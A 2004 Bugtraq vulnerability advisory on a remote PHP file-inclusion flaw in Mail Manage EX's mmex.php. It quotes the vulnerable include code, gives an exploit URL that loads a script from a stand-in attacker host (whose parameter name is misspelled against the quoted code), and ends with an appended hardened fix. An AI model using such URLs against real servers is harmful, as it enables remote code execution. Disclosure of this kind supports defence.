Date: Thu, 3 Jun 2004 17:36:44 +0200
From: "JvdR" <thewarlock@...e.nl>
To: <bugtraq@...urityfocus.com>
Subject: PHP Include Exploit in Mail Manage EX  v3.1.8 and maybe others.


Description: PHP Include Exploit in Mail Manage EX  v3.1.8
Compromise: a malicious PHP script from an external host may be included and
executed.
Vulnerable Systems: all systems using mmex.php v3.1.8 and maybe lower (not
tested).
Details:
The PHP include exploit exists in the following code:

mmex.php--SNIP----->
#===========================================================
# Register Globals
#===========================================================

$Settings = $_REQUEST['Settings'];
$Refresh = $_REQUEST['Refresh'];
$FormRecipient = $_REQUEST['Recipient'];
$EMAIL[0] = $_REQUEST['email'];
$EMAIL[1] = $_REQUEST['Email'];
$EMAIL[2] = $_REQUEST['E_mail'];
$EMAIL[3] = $_REQUEST['e_mail'];
$EMAIL[4] = $_REQUEST['email_address'];
$EMAIL[5] = $_REQUEST['Email_Address'];
$EMAIL[6] = $_REQUEST['Email_address'];

#===========================================================
# CHECK SETTINGS & FORM RECIPIENT
#===========================================================
if(!$Settings)
  exit ("<b>No settings were found for this form.</b>");

$Include = @include($Settings);
if (!$Include)
 exit ("<b>Incorrect settings filename in your form or specified file does not exist.</b>");
mmex.php---EOF----->

"$Settings" is taken directly from the request and passed to include(), so it
can be used to include malicious PHP code.

How to exploit this bug?

http://www.target.com/mail/mmex.php?Setings=http://www.h4x0r.b0x/malicious.php

malicious.php is executed by the target.


Solution:
No solution provided.
Gregg Kenneth Jewell of "Mail Manage EX" has been informed.

Greetings,


Jan van de Rijt aka The Warlock.
http://members.home.nl/thewarlock/
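
One way to close the include shown above, as an added example that is not part of the original advisory or of Mail Manage EX: the request value is accepted only as a bare file name and must resolve to a file inside one fixed directory before it is included. SETTINGS_DIR and resolve_settings() are hypothetical names, and the code assumes PHP 7.1 or later.

```php
<?php
// Added example (not Mail Manage EX code). SETTINGS_DIR and
// resolve_settings() are hypothetical names; the directory layout
// is an assumption.

const SETTINGS_DIR = __DIR__ . '/settings';

/**
 * Return the absolute path of a settings file, or null if the request
 * value is not a plain file name that resolves inside $baseDir.
 */
function resolve_settings($requested, string $baseDir = SETTINGS_DIR): ?string
{
    // Reject arrays (Settings[]=x) and anything that is not a bare
    // name such as "contact.php": no scheme, no slashes, no "..".
    if (!is_string($requested)
        || !preg_match('/\A[A-Za-z0-9_-]{1,64}\.php\z/', $requested)) {
        return null;
    }

    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $path === false) {
        return null;                      // directory or file missing
    }

    // realpath() has followed symlinks; the result must still sit
    // directly inside the settings directory and be a regular file.
    if (dirname($path) !== $base || !is_file($path)) {
        return null;
    }
    return $path;
}

$file = resolve_settings($_REQUEST['Settings'] ?? null);
if ($file === null) {
    http_response_code(400);
    exit('<b>Incorrect settings filename in your form or specified file does not exist.</b>');
}
include $file;
```

Keeping allow_url_include set to Off in php.ini (its default since PHP 5.2) additionally stops include() from fetching http:// URLs, but it does not replace the file name check, since local paths would still be accepted.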




